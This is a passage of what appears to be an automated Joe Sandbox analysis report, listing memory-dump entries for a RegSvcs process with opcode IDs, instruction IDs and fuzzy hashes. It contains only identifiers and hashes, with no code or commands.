                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                              • Instruction ID: 3e691c79fc77b33968e88a83593241d7348ba182592908c2d0bef593d2fd7c22
                                                                                              • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                              • Instruction Fuzzy Hash: 4C517C75A00219CFCB95CF98C480AAEFBF2FF84714F2482A9D995A7351D770AE41CB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bfdc69575cf54a3e9c87af92c5def0f082c3d6937315aea5d30fcd830930eece
                                                                                              • Instruction ID: 526572786df9011835dae4c7a9b9934dfee5a79d370715b48614f0d7f7fa1c67
                                                                                              • Opcode Fuzzy Hash: bfdc69575cf54a3e9c87af92c5def0f082c3d6937315aea5d30fcd830930eece
                                                                                              • Instruction Fuzzy Hash: 655106B090025ADBDF65CB68CC41BE8BBB1EF11314F1482A9E669E72D1D7399981EF40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5cc76b9a7746e1ba2f6b42bc96a745bba95a15becbd1f2ab1945390444c138d4
                                                                                              • Instruction ID: b68a89984a35d67803df107904639ccc41a59fd3a3d8009566fee7d8931187e0
                                                                                              • Opcode Fuzzy Hash: 5cc76b9a7746e1ba2f6b42bc96a745bba95a15becbd1f2ab1945390444c138d4
                                                                                              • Instruction Fuzzy Hash: 4C41BF32A002689BCB61EF6DCD44BEA77B8EF85750F1101A5E948AB241DB74DE80DF91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                              • Instruction ID: 3f69262eb41687215c9ec90d70bfbb6e617a7c33b5555b809dcd308e69b85d08
                                                                                              • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                              • Instruction Fuzzy Hash: B9419575B00205ABEB15DFD9CC85ABFBFFABF88641F5480AAE584A7351DA70DD008760
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 97070b2dfa6577006fbabdae5a9b08a35c1e4ca25e2ff92c5b2193bb05cd4511
                                                                                              • Instruction ID: 668110093d0c7252859bfce8ac76e3917a8eae181073412776da9a586d6e51d6
                                                                                              • Opcode Fuzzy Hash: 97070b2dfa6577006fbabdae5a9b08a35c1e4ca25e2ff92c5b2193bb05cd4511
                                                                                              • Instruction Fuzzy Hash: F841F6716007459FD725CF26C880A2AB7F9FF48314B104A6DE58787752EBB4F885EB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 33b9777dee66b18b04dac65d1c536b88366f03c75ef5ee9b68f79217bd11d87c
                                                                                              • Instruction ID: eaa2ed3b6a47a581eecdfe684ac21cc132644a1d1fce6934aa7f418f28c41534
                                                                                              • Opcode Fuzzy Hash: 33b9777dee66b18b04dac65d1c536b88366f03c75ef5ee9b68f79217bd11d87c
                                                                                              • Instruction Fuzzy Hash: 04418E72A41304CFEB62DF68D8947EE7BB0FF44361F1501A5D595AB2E1DB3A9900CBA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 838ed7e8e8c0555be04d27fae9c98fdbb6bf8a3fecf8dbf98aa4b1afd123d939
                                                                                              • Instruction ID: 5b80ee2717ca1a90dd5820d173bcff360bbfa94f1314320bb11c5ec23740d3e0
                                                                                              • Opcode Fuzzy Hash: 838ed7e8e8c0555be04d27fae9c98fdbb6bf8a3fecf8dbf98aa4b1afd123d939
                                                                                              • Instruction Fuzzy Hash: 83415872A01241CBD724EF4AD880B5ABBF1FF85744F20806AE9459B665CB39D802DFA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 393a2b15fc707ee5f8abd5cdfbc46778cf3163f0dc2ec43d1216675c3222ee44
                                                                                              • Instruction ID: e295c1080ddd018c5f76af180a4877acdf43061f847a3557b9b4be6c039e8b5a
                                                                                              • Opcode Fuzzy Hash: 393a2b15fc707ee5f8abd5cdfbc46778cf3163f0dc2ec43d1216675c3222ee44
                                                                                              • Instruction Fuzzy Hash: 15415C325087069ED312DF64C850A6BB7E9EF84B94F45092BF9C4D7250EB31DE059B93
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                              • Instruction ID: 4c1dc30dab174335d9668e74c4c9c0783c7116c0e59cb7fbc362eb96651513f7
                                                                                              • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                              • Instruction Fuzzy Hash: D4413B32A00211DFDB21DE69C4447BEB7A6EFD0758F1980ABE9858B341D7368D40EB96
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bcc2a4b535cde89a1377f87c78d4124c5d5ae75c2728cd07243a7950387ea43a
                                                                                              • Instruction ID: 437a70c7aa2cb451f5566a00e3c13bf4ee06181114648e85fb3b18948a7a112a
                                                                                              • Opcode Fuzzy Hash: bcc2a4b535cde89a1377f87c78d4124c5d5ae75c2728cd07243a7950387ea43a
                                                                                              • Instruction Fuzzy Hash: 52417C71A00744EFD721CF19D841B2AB7F4FF44714F24896AE449CB252EBB5E982DB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                              • Instruction ID: adc5ca8acf8aea4d8cd59d320d88499f683ef6b9b2c55c666150feddd63135b4
                                                                                              • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                              • Instruction Fuzzy Hash: B8411871A04605EFDB24CF98C980AAABBF4FF18700B10496DE5D6DB659D334EA84CF90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7fe8c26d380fe72e09759822fb47a9a9058f908a6039e0d19394b549b3ba1dda
                                                                                              • Instruction ID: 9fd039d286edcc616fc2a18669c452cea968883f49b572a52f3894d70eb95b6d
                                                                                              • Opcode Fuzzy Hash: 7fe8c26d380fe72e09759822fb47a9a9058f908a6039e0d19394b549b3ba1dda
                                                                                              • Instruction Fuzzy Hash: 8941F4B1901744CFCB61EF2AC941B69B7F9FF94320F1082AAD4469B2A1EB349D41EF51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a7f9c39f7ccbc0dfd4bab73e19de48acdb8735ff538c5807d6284bf4862ac7d2
                                                                                              • Instruction ID: b83d679db201add7137d9884e81a764920e42dd367882374db8e8c6092836439
                                                                                              • Opcode Fuzzy Hash: a7f9c39f7ccbc0dfd4bab73e19de48acdb8735ff538c5807d6284bf4862ac7d2
                                                                                              • Instruction Fuzzy Hash: 0E3179B2A40245DFEB52CF68C540799BBF1FB09724F2081AED559EB251D736D902CF90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 90f7449e7cae7bdce9651b2e4cf6e1562378bcde628d3f04a24a5b5e3f816040
                                                                                              • Instruction ID: ca35ee33c2932d7f6c6a0b868f659cadcbace5b613816d9bb64c04fb23241c0e
                                                                                              • Opcode Fuzzy Hash: 90f7449e7cae7bdce9651b2e4cf6e1562378bcde628d3f04a24a5b5e3f816040
                                                                                              • Instruction Fuzzy Hash: D7416B715083059FD360DF28C845B9BBBE8FF88654F008A2AF9D8C7295D7749904CB92
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b431ba858cb19df113fa3a82bf535ace2d890a535cbef93ed9ff0b7855ff41b5
                                                                                              • Instruction ID: 2960aed4a0162debefddca6bbb5d624216d0e3bcd8846372033f94cbb332b3b4
                                                                                              • Opcode Fuzzy Hash: b431ba858cb19df113fa3a82bf535ace2d890a535cbef93ed9ff0b7855ff41b5
                                                                                              • Instruction Fuzzy Hash: 0841D0726446469FD320DF2CC880AAAB7E9FFC8700F144A69F99497694E734ED04C7A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 75470f87619d4b8afda51ec54a15e27dea3fe0372e7dc1bacd80383250c16453
                                                                                              • Instruction ID: b819e3e8c71b91d2577b1cc86bfb0f7c832a94b00925e6c44743802a92d8893e
                                                                                              • Opcode Fuzzy Hash: 75470f87619d4b8afda51ec54a15e27dea3fe0372e7dc1bacd80383250c16453
                                                                                              • Instruction Fuzzy Hash: 08410630A003418BC725CF29D894B3BB7EAEF80364F15446DF9919B2A2D735ED01DB51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                              • Instruction ID: 72e1955fc8b05631cc43181663d1f57b5b6e59515f0b313c5504b9a052477775
                                                                                              • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                              • Instruction Fuzzy Hash: 12312A32A04248AFDB219B68CC80BEABFE9EF44350F0441B5F855D7363C678D984DBA4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ef6a11320103950fc8469f230d2d89c8c25b74614335ab85e0dc51426bf89a52
                                                                                              • Instruction ID: e5280812267840b1d7543cccaeef876a845a9e79d358cb1274a6337ae6103f81
                                                                                              • Opcode Fuzzy Hash: ef6a11320103950fc8469f230d2d89c8c25b74614335ab85e0dc51426bf89a52
                                                                                              • Instruction Fuzzy Hash: 1D31CA3174071AABE722AF69CC41FAF7AA5AF48B50F100029F644AB2D1DFA5DD00D7E0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 995c31e60a2ebc0eb480784ebcdb60bd24d05573563b3a504e27c6f0239023aa
                                                                                              • Instruction ID: f1d6e6c0eb9f170823578f898f6f9cd3bd0a4d5df2756a43711f5c0ac30351ff
                                                                                              • Opcode Fuzzy Hash: 995c31e60a2ebc0eb480784ebcdb60bd24d05573563b3a504e27c6f0239023aa
                                                                                              • Instruction Fuzzy Hash: 8D31C1726052048FCB61DF1DD9A0E6AB7F5FF84360F0A44ADE9D5CB251D732A802EB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c16eaa5de7423748c3eb8fc8fee8ae75d1e7024238538e5b82ed29892308fbb7
                                                                                              • Instruction ID: a54ec291a6c3b23fad1226673a653b2e79586db48edbaf50daf5c572d527058d
                                                                                              • Opcode Fuzzy Hash: c16eaa5de7423748c3eb8fc8fee8ae75d1e7024238538e5b82ed29892308fbb7
                                                                                              • Instruction Fuzzy Hash: 1B41DD72200B458FC722CF29C981BD67BE8BF08350F10846DFAA99B291C774F800EB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ca581e5a46ef02a9b1c170dc75a4e6dce4e6965fe741126622a0e55b8a9d6d3f
                                                                                              • Instruction ID: 547c7e8ddd0903acd37f786dc9342853b3d0fb88db4386bf3db76356f204b484
                                                                                              • Opcode Fuzzy Hash: ca581e5a46ef02a9b1c170dc75a4e6dce4e6965fe741126622a0e55b8a9d6d3f
                                                                                              • Instruction Fuzzy Hash: 7031BEB16042458FDB60DF28D9A0A6AB7E5FB84310F09456DF9D4CB391D730E806DB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b9d85d2df2db1bc922282f5cb3352613546b37d964e29d0f7ea6c7a07b162003
                                                                                              • Instruction ID: a4dc4ac96fd58a9845b38407f3fc26fb0b843bc68f216457a5b9047f9f4ce241
                                                                                              • Opcode Fuzzy Hash: b9d85d2df2db1bc922282f5cb3352613546b37d964e29d0f7ea6c7a07b162003
                                                                                              • Instruction Fuzzy Hash: E031C3317416899BF3A2975CCD48B6BBBD8AF40740F1900E0BFC58B6E2DB68DA41C220
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3ab323a25c05b1489fca30f4bf3e591442d277a3020be4b373257403cf0006c3
                                                                                              • Instruction ID: 7c04a1b0339aecc528a8664b7ce2e13ced5c593e95549ef390fc92d3d1900abd
                                                                                              • Opcode Fuzzy Hash: 3ab323a25c05b1489fca30f4bf3e591442d277a3020be4b373257403cf0006c3
                                                                                              • Instruction Fuzzy Hash: A731C475A0051AABDB15DFD8CC40FAEB7B5FB44B40F454169E940EB244D771ED40CB94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 42587f10062d9cf6c0ea50ebcb9be1a0a323122f477c0c152272db9cefaaa80e
                                                                                              • Instruction ID: 30943014133f20e10e6c24c33209984011e71185ac5ea52023459f69d352ed3a
                                                                                              • Opcode Fuzzy Hash: 42587f10062d9cf6c0ea50ebcb9be1a0a323122f477c0c152272db9cefaaa80e
                                                                                              • Instruction Fuzzy Hash: B0317376A4012DABCF71EF54DC84BDEBBF5AB98350F1100E5E588E7250DA349E918F90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 61e4cda987b57f52ef1b2936d6f8002c9e1a1607f6ab005fea929d0098b91180
                                                                                              • Instruction ID: be21fda32469062f1c86851fb513b83d55db5522b2e97bb3333a3914a4a35ca0
                                                                                              • Opcode Fuzzy Hash: 61e4cda987b57f52ef1b2936d6f8002c9e1a1607f6ab005fea929d0098b91180
                                                                                              • Instruction Fuzzy Hash: AB31C872E00615AFEB22DEA9CC40AAFBBF9EF44750F014465E595E7290D6749A008BA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 44641f06f34d08409950c8856e51a69578ec0c4ddcf08e1c9179640cc6402309
                                                                                              • Instruction ID: 578f4f7974a4c956cae5848cfc3b0a10aa7b6d26d27056fa1915b2a595f7cf8d
                                                                                              • Opcode Fuzzy Hash: 44641f06f34d08409950c8856e51a69578ec0c4ddcf08e1c9179640cc6402309
                                                                                              • Instruction Fuzzy Hash: 0B31E271A00605ABDB129FE9CC50A6FBBF9AF44750F484069E681DB352DA36ED008B90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c7dbcee1be0d88c606a87fc3ba0022dcc0afb89cf941972fecd7c9ae08206739
                                                                                              • Instruction ID: 091cb2de9be956a6d8c43c5b7f602773fad51e845a3687416c288126e01d9090
                                                                                              • Opcode Fuzzy Hash: c7dbcee1be0d88c606a87fc3ba0022dcc0afb89cf941972fecd7c9ae08206739
                                                                                              • Instruction Fuzzy Hash: 18313332A04396DBC712DE26C880E6BBBE5AFD4360F054529FC85AB311DE74DD41A7E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 02e6dcffa691451faffe0a24e124fdb6e23a90548fd4bc522e3418584501d14f
                                                                                              • Instruction ID: 76d6add47c31b2c3a2c7632500ea66755f86aedc94642880f564bd343920f78a
                                                                                              • Opcode Fuzzy Hash: 02e6dcffa691451faffe0a24e124fdb6e23a90548fd4bc522e3418584501d14f
                                                                                              • Instruction Fuzzy Hash: 36318DB16053418FE360DF19D880B2AB7E5EF88750F0849ADF98897251DB71EC44CB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                              • Instruction ID: cc548991c0e34359c4229bd87484850e428103e18cd62554bf71dfa3c7843259
                                                                                              • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                              • Instruction Fuzzy Hash: D4314AB2B01B41EFD7A1CF69DD40B67BBF8BF08A50F04096DA59AC3650E634E9008B60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: af822b0b5c4435a27c6b6bf6f1696f3b3412c9de395890edf5f6f61c7bfbf987
                                                                                              • Instruction ID: 9d6fcffa9661ab8375597e9b042dac62bb14b10d780e1572642c935dec8a3d74
                                                                                              • Opcode Fuzzy Hash: af822b0b5c4435a27c6b6bf6f1696f3b3412c9de395890edf5f6f61c7bfbf987
                                                                                              • Instruction Fuzzy Hash: EA319AB19093099FCB21EF19C94086ABBF1FF89314F0549AEF4C89B252D331D946CB92
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7c3f223e5f6ec83431b90edc3888509db9f6ad826f6d94f0190bf631a5f7c36b
                                                                                              • Instruction ID: 18690f16ece0d8d9f779bdd144954e4707e3fafeaea4c5a94957caa70970e0b6
                                                                                              • Opcode Fuzzy Hash: 7c3f223e5f6ec83431b90edc3888509db9f6ad826f6d94f0190bf631a5f7c36b
                                                                                              • Instruction Fuzzy Hash: 7A310571B003059FE721EFB8C981AAEBBF9EF84304F018529D685D3291DB35E941CB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                              • Instruction ID: b7b5e8d169dfa33aa7bff67073b496371d92bcd5c54f205867ffb36cd8a87d72
                                                                                              • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                              • Instruction Fuzzy Hash: 2A210B32F4125BAAD7119BB58801BAFBBBAAF44750F198176AE95F7340E370D900D7E0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d05f1d8ab746811a7add45ac9dac9dbb9c2c23660e5cf7f0256035fcaec579fd
                                                                                              • Instruction ID: cfd0fbbd249e375f2f09e17e29bfda911c52e8f70fedf5f4efdce3667ddc2344
                                                                                              • Opcode Fuzzy Hash: d05f1d8ab746811a7add45ac9dac9dbb9c2c23660e5cf7f0256035fcaec579fd
                                                                                              • Instruction Fuzzy Hash: ED313E715002108BDB61AF58CC41BB977B8BF84314F9881A9EDC59B352EA39D985DB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
